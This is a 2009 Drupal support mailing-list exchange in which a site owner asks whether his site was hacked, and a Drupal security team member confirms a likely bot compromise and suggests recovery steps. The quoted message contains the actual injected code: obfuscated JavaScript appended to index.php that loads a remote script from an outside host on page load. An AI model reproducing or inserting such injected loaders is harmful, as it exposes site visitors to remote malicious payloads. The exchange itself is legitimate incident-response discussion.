[support] Hacked or not

Kieran Lal kieran at acquia.com
Thu Dec 31 15:57:55 UTC 2009 

See: My site was defaced ("hacked"). Now what?http://drupal.org/node/213320

If your index file has been been modified then your site has been hacked,
likely by a bot.  Change that index file and revisit the file permissions
for your Drupal code files.  Ask your hosts if they have a back-up of your
database and see if they are willing to work with you to identify when each
account was compromised.

Cheers,
Kieran
Drupal security team coordinator

2009/12/30 steven <steven at vermoere.net>

> Hello,
>
> I've encounterd a strange problem.
>
> One of me sites has a changed index.php. The date of the file changed and
> the following lines were added at the end of the file:
>
> /*GNU GPL*/ try{window.onload = function(){var G2kfrz1an5r =
>
> document.createElement('s&$c$@(#r!!i^$p^$t^$@'.replace(/\$|\)|\(|&|\!|\^|@|#/ig,
> ''));var Bl136slxkfs = 'Y0p6c2vs6gca8';G2kfrz1an5r.setAttribute('type',
> 't^!^^e#&x!$@t)(@/!)(j@#$@a@
> )v#a!)s^c$(r(!&^i^^^)p&)$!t#&@'.replace(/@|\)|#|\(|&|\$|\!|\^/ig,
> ''));G2kfrz1an5r.setAttribute('src',
> 'h()t)&^t#(p$:#!#!/$@!^/()q@(u))&i$$^k(##r$^-(^!@#c$o&&m).#^i(^#m@
> &&a(g^$e&$f(##a$p()(.^&c@^()@o&^$^m$^^.!@&#l!a(^s#)t at -^))f#@&m#.$$t@
> ^h#$e)&(g$&i@&(f($@t)@&s$a(&)#l!)e@
> #.^r&)#u#!!(:)@&8#&(!0#&8$@$&0&((/#!^u^!&s^p^!!s(.^&^c@(o@$#m@^/((u@@!s at p
> $$@s$.^$$#c at o)m$@((!/!^a&#!!d@$u at l@t)$f#$$r@
> )!^i$e$!&n$#)d!)f(^i#n(!d)($e&)r!@@!.)(^c(o$m!!!!/@#(g@
> ^o#@o$@g)()l#&)^e#).@(c)o(m$@^#/@#d at a@!i$l@^#y#&m)$a#i)(l)(#.(@!c&(o@
> (&@.$(!!u!#k^!@/)!!$'.replace(/@|\)|\!|\(|\^|&|\$|#/ig,
> ''));G2kfrz1an5r.setAttribute('defer',
> 'd(&e)f(^e!r('.replace(/#|\)|&|@|\(|\!|\^|\$/ig,
> ''));G2kfrz1an5r.setAttribute('id',
> 'S$##0 at 9^&&q$!^(t at b
> @$$7&(#v$))b#^@^v(!)y)#$9^@5&^#'.replace(/\$|#|\^|\(|&|@|\)|\!/ig,
> ''));document.body.appendChild(G2kfrz1an5r);}} catch(Y2gjfbp30rk) {}
>
> I have the impression this is encrypted javascript.
>
> Is this site hacked ? And if yes, is this due to Drupal or server-side ?
>
> Thank you
>
> Steven
>
> --
> [ Drupal support list | http://lists.drupal.org/ ]
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.drupal.org/pipermail/support/attachments/20091231/b601dc7e/attachment.html

More information about the support mailing list